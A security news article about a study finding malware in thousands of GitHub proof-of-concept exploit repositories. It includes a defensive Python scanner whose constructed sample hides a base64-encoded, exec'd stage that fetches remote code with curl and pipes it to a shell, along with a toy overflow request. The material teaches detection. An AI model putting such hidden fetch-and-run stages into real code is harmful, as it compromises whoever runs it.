Thousands of PoC Exploits on GitHub are Laced with Malware, Study Shows
Thousands of proof-of-concept (PoC) vulnerability exploits on GitHub are riddled with malware, according to a recent study by researchers at the Leiden Institute of Advanced Computer Science.
GitHub is popular among security experts who want to share their findings with the community. PoC repositories help cybersecurity researchers validate potential fixes for new vulnerabilities and perform security assessments in stable, controlled environments against known exploits.
While PoC exploits are also shared on dedicated websites, forums and communication platforms, code-hosting platforms like GitHub are often the first place practitioners look. On the downside, GitHub's public code repositories guarantee nothing about a PoC's legitimacy, its provenance, or its efficacy.
“Professional frameworks like Metasploit or reputable databases like Exploit-DB contain exploits for many CVEs, but not for all of them,” reads the researchers’ technical paper. “Pentesters then turn to Proof of Concept (PoC) exploits published in public code repositories like GitHub to see if they can find something they can use to exploit the issue and demonstrate the vulnerability.”
The study, led by Soufian El Yadmani, Robin The and Olga Gadyatskaya, found that 4,893 of the 47,313 repositories analyzed (10.3%) showed signs of malicious intent. To decide whether a repository was built to cause harm, the researchers looked for traits such as Trojanized binaries, obfuscated rogue code, and callbacks to malicious IP addresses.
The research further revealed that the malicious PoC repositories had different aims. Some hid malware and other harmful scripts, some tried to harvest data from users, while others pranked users to remind them of the perils of running a PoC without analyzing the code beforehand.
To avoid exposing themselves to malware-laced PoC exploits, users should read the code thoroughly before running it, decode any obfuscated blobs instead of trusting them, and execute the PoC only in a controlled environment (a sandbox or a disposable virtual machine with no path to production networks), whether or not it looks obfuscated.
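The checks above can be turned into a first-pass triage script. The following is an added example written for this article; it is not tooling from the Leiden study or from Bitdefender. It scans a checkout for the indicator classes the article names (embedded executables, long base64 or `\x`-encoded blobs, hard-coded public IP addresses, and data that is decoded and immediately passed to `exec`/`eval`/a shell), rescanning decoded base64 one level deep so an obfuscated stage that hides a callback address still surfaces. The three sample files are constructed for the demonstration; the `8.8.8.8` callback, the file names and the `scan_*` function names are all assumptions, not anything from the study's data set.

```python
"""Triage helper for a freshly cloned PoC repository.

Added example, not the Leiden study's tooling. A hit is a reason to read that
spot closely, not proof of malice: a genuine exploit legitimately carries
shellcode, and a prank repo may carry nothing at all.
"""
import base64
import binascii
import ipaddress
import os
import re
from typing import Dict, List, Tuple

Finding = Tuple[str, str]  # (indicator, detail)

# Executable magic numbers; a source-only PoC has no reason to ship these.
EXEC_MAGIC = {
    b"MZ": "PE executable",
    b"\x7fELF": "ELF executable",
    b"\xcf\xfa\xed\xfe": "Mach-O executable",
}
B64_RE = re.compile(rb"[A-Za-z0-9+/]{60,}={0,2}")    # long base64 run
HEX_RE = re.compile(rb"(?:\\x[0-9a-fA-F]{2}){24,}")   # "\x41\x42..." byte string
IPV4_RE = re.compile(rb"\b(?:\d{1,3}\.){3}\d{1,3}\b")
# Something decoded at runtime and handed straight to exec/eval/a shell.
DECODE_EXEC_RE = re.compile(
    rb"\b(?:exec|eval|os\.system|subprocess\.\w+)\s*\(.*?(?:b64decode|fromhex|unhexlify)",
    re.S,
)


def _is_public_ip(raw: bytes) -> bool:
    """True for routable addresses; lab targets like 192.168.x.x are ignored."""
    try:
        return ipaddress.ip_address(raw.decode()).is_global
    except ValueError:  # not a valid dotted quad, e.g. 999.1.1.1
        return False


def scan_bytes(name: str, data: bytes, depth: int = 0) -> List[Finding]:
    """Scan one file's bytes; decoded base64 text is rescanned one level deep."""
    findings: List[Finding] = []
    for magic, kind in EXEC_MAGIC.items():
        if data.startswith(magic):
            return [("embedded_binary", f"{name}: {kind}")]  # no regex scan of binaries
    for m in B64_RE.finditer(data):
        blob = m.group(0)
        try:
            decoded = base64.b64decode(blob, validate=True)
        except (binascii.Error, ValueError):
            decoded = b""
        if any(decoded.startswith(mg) for mg in EXEC_MAGIC):
            findings.append(("base64_executable", f"{name}: {len(blob)}-char blob decodes to an executable"))
        else:
            findings.append(("base64_blob", f"{name}: {len(blob)}-char base64 run"))
            if depth == 0 and decoded.isascii():  # look inside an obfuscated stage once
                findings += scan_bytes(f"{name} (decoded)", decoded, depth + 1)
    if HEX_RE.search(data):
        findings.append(("hex_blob", f"{name}: long \\x-encoded byte string (shellcode or hidden payload)"))
    for m in IPV4_RE.finditer(data):
        if _is_public_ip(m.group(0)):
            findings.append(("public_ip", f"{name}: hard-coded public address {m.group(0).decode()}"))
    if DECODE_EXEC_RE.search(data):
        findings.append(("decode_then_exec", f"{name}: decoded data passed to exec/eval/shell"))
    return findings


def scan_repo(root: str) -> Dict[str, List[Finding]]:
    """Walk a checkout and return findings per file (skips .git metadata)."""
    report: Dict[str, List[Finding]] = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d != ".git"]
        for fn in filenames:
            path = os.path.join(dirpath, fn)
            with open(path, "rb") as fh:
                report[os.path.relpath(path, root)] = scan_bytes(fn, fh.read())
    return report


# Constructed samples standing in for three files of a cloned repository.
_STAGE2 = b'import os\nos.system("curl -s http://8.8.8.8/s | sh")  # constructed C2\n'
SAMPLES: Dict[str, bytes] = {
    # Looks like an ordinary PoC: private lab target, nothing encoded.
    "exploit.py": (
        b"import socket, sys\n"
        b'TARGET = sys.argv[1] if len(sys.argv) > 1 else "192.168.56.101"\n'
        b"s = socket.create_connection((TARGET, 8080))\n"
        b's.sendall(b"GET /" + b"A" * 3000 + b" HTTP/1.1\\r\\n\\r\\n")\n'
    ),
    # Same shape, but a base64 stage is decoded and exec'd at import time.
    "poc.py": (
        b"import base64\n"
        b'TARGET = "192.168.56.101"\n'
        b'STAGE2 = "' + base64.b64encode(_STAGE2) + b'"\n'
        b"exec(base64.b64decode(STAGE2))  # runs before the 'exploit' does\n"
    ),
    # A prebuilt binary committed alongside the scripts.
    "bin/helper": b"\x7fELF\x02\x01\x01" + b"\x00" * 57,
}


def scan_samples() -> Dict[str, List[Finding]]:
    return {name: scan_bytes(name, data) for name, data in SAMPLES.items()}


if __name__ == "__main__":
    import sys
    report = scan_repo(sys.argv[1]) if len(sys.argv) > 1 else scan_samples()
    for fname, hits in report.items():
        print(fname, "-> clean" if not hits else "")
        for indicator, detail in hits:
            print(f"  [{indicator}] {detail}")
```

Run it with a directory argument against a real checkout, or with no argument to see the constructed samples: `exploit.py` comes back clean, `bin/helper` is flagged as an embedded ELF, and `poc.py` is flagged three times, including the `8.8.8.8` address that only exists inside the base64 stage. The script is deliberately noisy in one direction: legitimate shellcode trips `hex_blob`, which is fine, because that is exactly the part of a PoC a reviewer should read before running it.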
Dedicated software like Bitdefender Ultimate Security can protect you against malicious PoC exploits and other cyberthreats thanks to its comprehensive library of features, which includes:
- Continuous, real-time protection against viruses, worms, Trojans, zero-day exploits, rootkits, spyware, ransomware and other e-threats
- Network threat prevention module that scans, detects and blocks malicious network-level activities
- Behavioral detection technology that closely monitors active apps and takes instant action upon detecting suspicious activity
- Vulnerability assessment module that scans your system for outdated and vulnerable software, outdated security patches and unsafe system settings, and suggests the best fix